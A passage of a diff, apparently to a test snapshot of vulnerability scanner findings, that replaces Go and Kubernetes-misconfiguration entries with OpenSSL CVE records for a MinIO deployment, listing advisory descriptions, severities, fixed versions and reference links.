"https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://linux.oracle.com/cve/CVE-2023-2650.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://ubuntu.com/security/notices/USN-6188-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://ubuntu.com/security/notices/USN-6188-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2097", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2097", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "https://linux.oracle.com/cve/CVE-2022-2097.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220715-0011/", + "https://security.netapp.com/advisory/ntap-20230420-0008/", + "https://ubuntu.com/security/notices/USN-5502-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "https://www.debian.org/security/2023/dsa-5343", + "https://www.openssl.org/news/secadv/20220705.txt", ], }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "category": "Vulnerability", + "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.allowPrivilegeEscalation' to false)", + "mitigation": undefined, + "name": "AES OCB fails to encrypt some bytes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://avd.aquasec.com/nvd/cve-2022-2097", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'minio' of Deployment 'securecodebox-operator-minio' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://access.redhat.com/security/cve/CVE-2022-2097", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://bugzilla.redhat.com/2081494", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://bugzilla.redhat.com/2087913", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://bugzilla.redhat.com/2104905", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", - ], - }, - "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.requests.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.runAsGroup' > 10000)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", - }, - { - "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", - "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27191", - "installedVersion": "v0.0.0-20220131195533-30dcbda58838", - "packageName": "golang.org/x/crypto", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:8008", - "https://access.redhat.com/security/cve/CVE-2022-27191", - "https://bugzilla.redhat.com/1939485", - "https://bugzilla.redhat.com/1989564", - "https://bugzilla.redhat.com/1989570", - "https://bugzilla.redhat.com/1989575", - "https://bugzilla.redhat.com/2064702", - "https://bugzilla.redhat.com/2121445", - "https://bugzilla.redhat.com/2121453", - "https://errata.almalinux.org/9/ALSA-2022-8008.html", - "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", - "https://go.dev/cl/392355", - "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", - "https://linux.oracle.com/cve/CVE-2022-27191.html", - "https://linux.oracle.com/errata/ELSA-2022-8008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", - "https://pkg.go.dev/vuln/GO-2021-0356", - "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", - "https://security.netapp.com/advisory/ntap-20220429-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-27191", - ], - }, - "category": "Vulnerability", - "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "crash in a golang.org/x/crypto/ssh server", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27191", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8008", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27191", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1939485", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989564", + "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989570", + "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989575", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2064702", + "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121445", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121453", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", }, { "type": "URL", - "value": "https://go.dev/cl/392355", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "value": "https://ubuntu.com/security/notices/USN-5502-1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "value": "https://www.debian.org/security/2023/dsa-5343", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://www.openssl.org/news/secadv/20220705.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4304", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4304", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + 